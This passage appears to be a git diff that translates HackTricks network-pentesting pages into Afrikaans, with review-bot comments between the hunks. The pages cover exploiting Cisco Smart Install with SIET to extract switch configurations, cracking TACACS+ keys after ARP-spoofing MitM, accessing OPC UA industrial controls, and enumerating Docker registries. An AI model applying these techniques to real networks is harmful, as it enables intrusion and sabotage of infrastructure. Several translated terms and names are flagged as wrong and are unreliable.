[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
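Review bot: the `## Automatic` hunk inserts five paragraphs, from `BACnet is 'n protokol wat gebruik word vir die outomatiese beheer van geboue.` through the ethics paragraph `Dit is belangrik om te verstaan ...`, that do not exist in the English source; they describe a UDP primer and a broadcast discovery procedure to 255.255.255.255 that the page never had, so remove them and leave the section as the translated heading, the nmap command and the sentence `Hierdie skrip probeer nie om by 'n BACnet-netwerk aan te sluit ...`, which is a faithful rendering of the original. The section headings are mistranslated: `# Enumeration` became `# Opstel` (set up / draw up) and `## Manual` became `## Handleiding` (a handbook), where the intended meanings are `# Enumerasie` and `## Handmatig`. The blank lines before and after the fences and before `# Enumeration` are stripped here as well; keep them. Pre-existing and not introduced by this change, but worth fixing while the block is touched: the context line `47808/udp open BACNet -- Building Automation and Control NetworksEnumerate` has the word `Enumerate` fused onto the end of the nmap output.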
- - diff --git a/network-services-pentesting/4786-cisco-smart-install.md b/network-services-pentesting/4786-cisco-smart-install.md index 3f97bcb2c..f03dc7e9f 100644 --- a/network-services-pentesting/4786-cisco-smart-install.md +++ b/network-services-pentesting/4786-cisco-smart-install.md @@ -1,62 +1,58 @@ -# 4786 - Cisco Smart Install +# 4786 - Cisco Slim Installeer
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks af in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
-## Basic Information +## Basiese Inligting -**Cisco Smart Install** is a Cisco designed to automate the initial configuration and loading of an operating system image for new Cisco hardware. **By default, Cisco Smart Install is active on Cisco hardware and uses the transport layer protocol, TCP, with port number 4786.** - -**Default port:** 4786 +**Cisco Slim Installeer** is 'n Cisco-ontwerp wat die outomatiese aanvangskonfigurasie en laai van 'n bedryfstelselbeeld vir nuwe Cisco-hardeware outomatiseer. **Standaard is Cisco Slim Installeer aktief op Cisco-hardeware en gebruik die transportlaagprotokol, TCP, met poortnommer 4786.** +**Standaardpoort:** 4786 ``` PORT STATE SERVICE 4786/tcp open smart-install ``` +## **Slim Installeer Uitbuitingshulpmiddel** -## **Smart Install Exploitation Tool** +**In 2018 is 'n kritieke kwesbaarheid, CVE-2018-0171, in hierdie protokol ontdek. Die dreigingsvlak is 9.8 op die CVSS-skaal.** -**In 2018, a critical vulnerability, CVE-2018–0171, was found in this protocol. The threat level is 9.8 on the CVSS scale.** +**'n Spesiaal vervaardigde pakkie wat na die TCP/4786-poort gestuur word, waar Cisco Slim Installeer aktief is, veroorsaak 'n buffer-oorloop, wat 'n aanvaller in staat stel om:** -**A specially crafted packet sent to the TCP/4786 port, where Cisco Smart Install is active, triggers a buffer overflow, allowing an attacker to:** +* die toestel gedwonge te herlaai +* RCE te roep +* konfigurasies van netwerktoerusting te steel. -* forcibly reboot the device -* call RCE -* steal configurations of network equipment. +**Die** [**SIET**](https://github.com/frostbits-security/SIET) **(Slim Installeer Uitbuitingshulpmiddel)** is ontwikkel om van hierdie kwesbaarheid gebruik te maak, dit stel jou in staat om Cisco Slim Installeer te misbruik. In hierdie artikel sal ek jou wys hoe jy 'n legitieme netwerkhardeware-konfigurasie-lêer kan lees. 
Konfigurasie-uitvloei kan waardevol wees vir 'n pentester omdat dit hom bewus sal maak van die unieke kenmerke van die netwerk. En dit sal die lewe vergemaklik en nuwe vektore vir 'n aanval vind. -**The** [**SIET**](https://github.com/frostbits-security/SIET) **(Smart Install Exploitation Tool)** was developed to exploit this vulnerability, it allows you to abuse Cisco Smart Install. In this article I will show you how you can read a legitimate network hardware configuration file. Configure exfiltration can be valuable for a pentester because it will learn about the unique features of the network. And this will make life easier and allow finding new vectors for an attack. - -**The target device will be a “live” Cisco Catalyst 2960 switch. Virtual images do not have Cisco Smart Install, so you can only practice on the real hardware.** - -The address of the target switch is **10.10.100.10 and CSI is active.** Load SIET and start the attack. **The -g argument** means exfiltration of the configuration from the device, **the -i argument** allows you to set the IP address of the vulnerable target. +**Die teikentoestel sal 'n "lewende" Cisco Catalyst 2960-sakwees wees. Virtuele beelde het nie Cisco Slim Installeer nie, so jy kan slegs op die regte hardeware oefen.** +Die adres van die teikensakwees is **10.10.100.10 en CSI is aktief.** Laai SIET en begin die aanval. **Die -g-argument** beteken uitvloei van die konfigurasie van die toestel, **die -i-argument** stel jou in staat om die IP-adres van die kwesbare teiken in te stel. ``` ~/opt/tools/SIET$ sudo python2 siet.py -g -i 10.10.100.10 ``` -
-The switch configuration **10.10.100.10** will be in the **tftp/** folder +Die skakelkonfigurasie **10.10.100.10** sal in die **tftp/**-vouer wees.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
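Review bot: `Cisco Smart Install` is a product name and `Smart Install Exploitation Tool` is the expansion of the SIET tool name; both are translated throughout this hunk (`Cisco Slim Installeer`, `Slim Installeer Uitbuitingshulpmiddel`), including in the page title `# 4786 - Cisco Slim Installeer` and in the `## **Slim Installeer Uitbuitingshulpmiddel**` heading, which breaks searchability and no longer matches the tool linked at github.com/frostbits-security/SIET; keep the English names and add an Afrikaans gloss in parentheses on first use at most. `sakwees` is not an Afrikaans word for switch (the same file later uses `skakelkonfigurasie`), so `Cisco Catalyst 2960-sakwees` and `teikensakwees` should become `-skakelaar` and `teikenskakelaar` for consistency. The change from `CVE-2018–0171` (en dash) to `CVE-2018-0171` is correct and should be kept, since the hyphenated form is the canonical identifier. As in the other files, the blank lines before `## **Smart Install Exploitation Tool**`, around the `siet.py` fence and before `Die skakelkonfigurasie` are removed; restore them.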
diff --git a/network-services-pentesting/4840-pentesting-opc-ua.md b/network-services-pentesting/4840-pentesting-opc-ua.md index 34b7c5bf0..20b933674 100644 --- a/network-services-pentesting/4840-pentesting-opc-ua.md +++ b/network-services-pentesting/4840-pentesting-opc-ua.md @@ -2,63 +2,59 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -**OPC UA**, standing for **Open Platform Communications Unified Access**, is a crucial open-source protocol used in various industries like Manufacturing, Energy, Aerospace, and Defence for data exchange and equipment control. It uniquely enables different vendors' equipment to communicate, especially with PLCs. +**OPC UA**, wat staan vir **Open Platform Communications Unified Access**, is 'n belangrike oopbron-protokol wat in verskeie bedrywe soos Vervaardiging, Energie, Lugvaart en Verdediging gebruik word vir data-uitruiling en toerustingbeheer. Dit maak dit uniek moontlik vir verskillende verskaffers se toerusting om te kommunikeer, veral met PLC's. -Its configuration allows for strong security measures, but often, for compatibility with older devices, these are lessened, exposing systems to risks. Additionally, finding OPC UA services can be tricky since network scanners might not detect them if they're on nonstandard ports. - -**Default port:** 4840 +Die konfigurasie maak sterk sekuriteitsmaatreëls moontlik, maar dikwels word hierdie maatreëls verminder vir die verenigbaarheid met ouer toestelle, wat stelsels aan risiko's blootstel. Daarbenewens kan dit moeilik wees om OPC UA-dienste te vind, aangesien netwerk-skandeerders dit dalk nie sal opspoor as hulle op nie-standaardpoorte is nie. +**Standaardpoort:** 4840 ```text PORT STATE SERVICE REASON 4840/tcp open unknown syn-ack ``` - ## Pentesting OPC UA -To reveal security issues in OPC UA servers, scan it with [OpalOPC](https://opalopc.com/). - +Om sekuriteitsprobleme in OPC UA-bedieners bloot te stel, skandeer dit met [OpalOPC](https://opalopc.com/). ```bash opalopc -vv opc.tcp://$target_ip_or_hostname:$target_port ``` +### Uitbuiting van kwesbaarhede -### Exploiting vulnerabilities +As daar omwegkwesbaarhede vir verifikasie gevind word, kan jy 'n [OPC UA-kliënt](https://www.prosysopc.com/products/opc-ua-browser/) konfigureer en sien wat jy kan toegang kry. 
Dit kan enigiets van bloot die lees van proseswaardes tot die werklik bedryf van swaar nywerheidsapparatuur moontlik maak. -If authentication bypass vulnerabilities are found, you can configure an [OPC UA client](https://www.prosysopc.com/products/opc-ua-browser/) accordingly and see what you can access. This may allow anything from merely reading process values to actually operating heavy-duty industrial equipment. - -To get a clue of the device you have access to, read the "ServerStatus" node values in the address space and google for a usage manual. +Om 'n idee te kry van die toestel waarop jy toegang het, lees die waardes van die "ServerStatus" node in die adresruimte en soek op Google vir 'n gebruikshandleiding. ## Shodan * `port:4840` -## References +## Verwysings * [https://opalopc.com/how-to-hack-opc-ua/](https://opalopc.com/how-to-hack-opc-ua/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
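Review bot: the expansion `Open Platform Communications Unified Access` is wrong in the English context line and is carried over unchanged into `wat staan vir **Open Platform Communications Unified Access**`; the UA stands for Unified Architecture, so correct the Afrikaans line here and open a separate fix for the English source (the acronym and protocol name themselves are rightly left untranslated). The footer renders `swag` as `HackTricks-uitrusting` while the header in the same file and the other files keep `swag`, and `github-opslag` in the footer differs from `github-repos` in the header a few lines above; use one wording for the boilerplate block. The hunk strips the blank lines before `## Pentesting OPC UA`, around the `opalopc` fence and before `### Uitbuiting van kwesbaarhede`; keep them so the headings render consistently with the English version.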
diff --git a/network-services-pentesting/49-pentesting-tacacs+.md b/network-services-pentesting/49-pentesting-tacacs+.md index 79da37bd5..6ef83ab18 100644 --- a/network-services-pentesting/49-pentesting-tacacs+.md +++ b/network-services-pentesting/49-pentesting-tacacs+.md @@ -2,67 +2,63 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-## Basic Information - -The **Terminal Access Controller Access Control System (TACACS)** protocol is used to centrally validate users trying to access routers or Network Access Servers (NAS). Its upgraded version, **TACACS+**, separates the services into authentication, authorization, and accounting (AAA). +## Basiese Inligting +Die **Terminal Access Controller Access Control System (TACACS)**-protokol word gebruik om gebruikers wat probeer om roeteryers of Netwerktoegangbedieners (NAS) te benader, sentraal te valideer. Sy opgegradeerde weergawe, **TACACS+**, skei die dienste in outentifikasie, magtiging en rekeningkunde (AAA). ``` PORT STATE SERVICE 49/tcp open tacacs ``` +**Verstekpoort:** 49 -**Default port:** 49 +## Onderskep Verifikasiesleutel -## Intercept Authentication Key +As die kommunikasie tussen die klient en TACACS-bediener deur 'n aanvaller onderskep word, kan die **versleutelde verifikasiesleutel onderskep** word. Die aanvaller kan dan 'n **plaaslike brute force-aanval teen die sleutel uitvoer sonder om in die logboeke opgespoor te word**. As die aanval suksesvol is en die sleutel gekraak word, verkry die aanvaller toegang tot die netwerktoerusting en kan die verkeer dekodeer met behulp van hulpmiddels soos Wireshark. -If the client and TACACS server communication is intercepted by an attacker, the **encrypted authentication key can be intercepted**. The attacker can then attempt a **local brute-force attack against the key without being detected in the logs**. If successful in brute-forcing the key, the attacker gains access to the network equipment and can decrypt the traffic using tools like Wireshark. +### Uitvoering van 'n MitM-aanval -### Performing a MitM Attack +'n **ARP-spoofing-aanval kan gebruik word om 'n Man-in-the-Middle (MitM) aanval** uit te voer. -An **ARP spoofing attack can be utilized to perform a Man-in-the-Middle (MitM) attack**. 
- -### Brute-forcing the Key - -[Loki](https://c0decafe.de/svn/codename\_loki/trunk/) can be used to brute force the key: +### Brute force-aanval op die Sleutel +[Loki](https://c0decafe.de/svn/codename\_loki/trunk/) kan gebruik word om die sleutel te kraak: ``` sudo loki_gtk.py ``` +As die sleutel suksesvol **bruteforced** word (**gewoonlik in MD5 versleutelde formaat)**, **kan ons toegang verkry tot die toerusting en die TACACS-versleutelde verkeer ontsluit.** -If the key is successfully **bruteforced** (**usually in MD5 encrypted format)**, **we can access the equipment and decrypt the TACACS-encrypted traffic.** +### Ontsluiting van Verkeer +Sodra die sleutel suksesvol gekraak is, is die volgende stap om die TACACS-versleutelde verkeer te **ontsluit**. Wireshark kan versleutelde TACACS-verkeer hanteer as die sleutel voorsien word. Deur die ontslote verkeer te analiseer, kan inligting soos die **banier wat gebruik word en die gebruikersnaam van die admin-gebruiker** verkry word. -### Decrypting Traffic -Once the key is successfully cracked, the next step is to **decrypt the TACACS-encrypted traffic**. Wireshark can handle encrypted TACACS traffic if the key is provided. By analyzing the decrypted traffic, information such as the **banner used and the username of the admin** user can be obtaine. +Deur toegang tot die beheerpaneel van netwerktoerusting te verkry deur die verkryde geloofsbriewe, kan die aanvaller beheer oor die netwerk uitoefen. Dit is belangrik om daarop te let dat hierdie aksies slegs vir opvoedkundige doeleindes is en nie sonder behoorlike magtiging gebruik moet word nie. -By gaining access to the control panel of network equipment using the obtained credentials, the attacker can exert control over the network. It's important to note that these actions are strictly for educational purposes and should not be used without proper authorization. 
- -## References +## Verwysings * [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
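Review bot: In the TACACS hunks the terminology for the AAA model and for decryption is inconsistent and partly wrong: `rekeningkunde (AAA)` renders "accounting" as accountancy (use `rekeninghouding` or keep the protocol term "accounting"), the same concept is `outentifikasie` in the Basic Information paragraph but `verifikasie` in the `## Onderskep Verifikasiesleutel` heading and body, and "decrypt" appears as both `dekodeer` (the Wireshark sentence) and `ontsluit` (`### Ontsluiting van Verkeer`); since `versleutelde` is already used for "encrypted", `ontsleutel` is the matching verb and should be used throughout. `suksesvol **bruteforced** word` leaves the English verb untranslated while the heading above it says `Brute force-aanval`; pick one form. Separately, the hunk drops the blank lines that separated headings, paragraphs and the code fences (e.g. `+## Basiese Inligting` is now directly followed by `+Die ...`); that is unrelated to the translation and inflates the diff, so the original spacing should be kept.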
diff --git a/network-services-pentesting/5000-pentesting-docker-registry.md b/network-services-pentesting/5000-pentesting-docker-registry.md index b2b2d2937..ef6d98d1c 100644 --- a/network-services-pentesting/5000-pentesting-docker-registry.md +++ b/network-services-pentesting/5000-pentesting-docker-registry.md @@ -1,76 +1,67 @@ -# 5000 - Pentesting Docker Registry +# 5000 - Pentesting Docker Register
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -A storage and distribution system known as a **Docker registry** is in place for Docker images that are named and may come in multiple versions, distinguished by tags. These images are organized within **Docker repositories** in the registry, each repository storing various versions of a specific image. The functionality provided allows for images to be downloaded locally or uploaded to the registry, assuming the user has the necessary permissions. +'n Berging- en verspreidingsisteem bekend as 'n **Docker-register** is in plek vir Docker-beelde wat benoem is en in verskillende weergawes kan voorkom, onderskei deur etikette. Hierdie beelde is georganiseer binne **Docker-opgaarplekke** in die register, elke opgaarplek stoor verskillende weergawes van 'n spesifieke beeld. Die funksionaliteit wat verskaf word, maak dit moontlik om beelde lokaal af te laai of na die register te laai, mits die gebruiker die nodige toestemmings het. -**DockerHub** serves as the default public registry for Docker, but users also have the option to operate an on-premise version of the open-source Docker registry/distribution or opt for the commercially supported **Docker Trusted Registry**. Additionally, various other public registries can be found online. - -To download an image from an on-premise registry, the following command is used: +**DockerHub** dien as die verstek openbare register vir Docker, maar gebruikers het ook die opsie om 'n plaaslike weergawe van die oopbron Docker-register/verspreiding te bedryf of te kies vir die kommersieel ondersteunde **Docker Trusted Registry**. Daarbenewens kan verskeie ander openbare registerplekke aanlyn gevind word. +Om 'n beeld van 'n plaaslike register af te laai, word die volgende opdrag gebruik: ```bash docker pull my-registry:9000/foo/bar:2.1 ``` - -This command fetches the `foo/bar` image version `2.1` from the on-premise registry at the `my-registry` domain on port `9000`. 
Conversely, to download the same image from DockerHub, particularly if `2.1` is the latest version, the command simplifies to: - +Hierdie bevel haal die `foo/bar` beeld weergawe `2.1` van die aan-premises register by die `my-registry` domein op poort `9000`. Om dieselfde beeld van DockerHub af te laai, veral as `2.1` die nuutste weergawe is, vereenvoudig die bevel na: ```bash docker pull foo/bar ``` - -**Default port:** 5000 - +**Verstekpoort:** 5000 ``` PORT STATE SERVICE VERSION 5000/tcp open http Docker Registry (API: 2.0) ``` +## Ontdekking -## Discovering +Die maklikste manier om hierdie diens te ontdek wat loop, is om dit op die uitset van nmap te kry. Hoe dan ook, let daarop dat dit 'n HTTP-gebaseerde diens kan wees wat agter HTTP-proksi's is en nmap sal dit nie opspoor nie.\ +Sommige vingerafdrukke: -The easiest way to discover this service running is get it on the output of nmap. Anyway, note that as it's a HTTP based service it can be behind HTTP proxies and nmap won't detect it.\ -Some fingerprints: +* As jy `/` toegang gee, word niks in die respons teruggegee nie +* As jy `/v2/` toegang gee, word `{}` teruggegee +* As jy `/v2/_catalog` toegang gee, kan jy kry: +* `{"repositories":["alpine","ubuntu"]}` +* `{"errors":[{"code":"UNAUTHORIZED","message":"authentication required","detail":[{"Type":"registry","Class":"","Name":"catalog","Action":"*"}]}]}` -* If you access `/` nothing is returned in the response -* If you access `/v2/` then `{}` is returned -* If you access `/v2/_catalog` you may obtain: - * `{"repositories":["alpine","ubuntu"]}` - * `{"errors":[{"code":"UNAUTHORIZED","message":"authentication required","detail":[{"Type":"registry","Class":"","Name":"catalog","Action":"*"}]}]}` - -## Enumeration +## Opname ### HTTP/HTTPS -Docker registry may be configured to use **HTTP** or **HTTPS**. So the first thing you may need to do is **find which one** is being configured: - +Docker-register kan gekonfigureer word om **HTTP** of **HTTPS** te gebruik. 
